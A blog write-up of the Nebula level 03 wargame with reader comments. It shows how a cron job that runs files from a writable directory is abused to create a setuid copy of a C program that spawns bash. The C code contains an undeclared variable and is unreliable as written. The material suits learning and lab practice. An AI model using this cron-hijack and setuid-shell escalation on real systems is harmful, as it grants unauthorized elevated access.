Exploit Exercises – Nebula – Level 03

The information about this level says:

Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03 . Files for this level can be found in /home/flag03.

Well looking in ~flag03 there is just one directory (writable.d) file and one file (writable.sh). I’m assuming that the cron job runs writable.sh every couple of minutes so I looked at that script. I can see that the script runs every file in the writable.d folder (which we have write access to), but will kill the process if it takes longer than 5 seconds. It then removes the file.

What we could do is make a quick bash script that will run getflag and save the output like this:

1
2
#!/bin/sh
getflag > /tmp/getflag.out

Which works (after we wait for the cron job to run it), but I want shell! So we’re going to borrow a trick from level01 and create a program that will launch a bash shell and get flag03 to set the setuid bit.

My C program looks like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
 
int main() {
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();
 
    setresgid(gid, id, gid);
    setresuid(uid, uid, uid);
 
    system("/bin/bash");
}

Now I just compile it with gcc and drop it in /tmp so that flag03 can access it. All I need the cron job to do now is make a copy and set the setuid bit, so here is the script I dropped in ~flag03/writable.d:

1
2
3
#!/bin/sh
cp /tmp/setuidshell /tmp/setuidshell2
chmod u+s /tmp/setuidshell2

This got me a program (/tmp/setuidshell2) in that gave me shell. From here I was able to run getflag, and also to run crontab -l to see that the cron job is actually called every 3 minutes.

5 thoughts on “Exploit Exercises – Nebula – Level 03

  1. Actually this shouldn’t work because your program setuidshell2 is located on /tmp which is a partition mounted with nosuid option preventing success of setres(g|u)id().

  2. can someone please explain me how to exactly do this flag? im stuck with this.
    i have made that getflag file as abc.sh but the permission is denied.
    help me out this.
    Completely new to this.

    • Are you trying to run the shell script yourself? That won’t work because you don’t have permissions, but the cron job does. Just stick your .sh file in the writeable.d folder and because the writable.sh script runs everything in that folder, it will be run by the cron job. You may have to wait up to 3 minutes for it to be run by cron.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.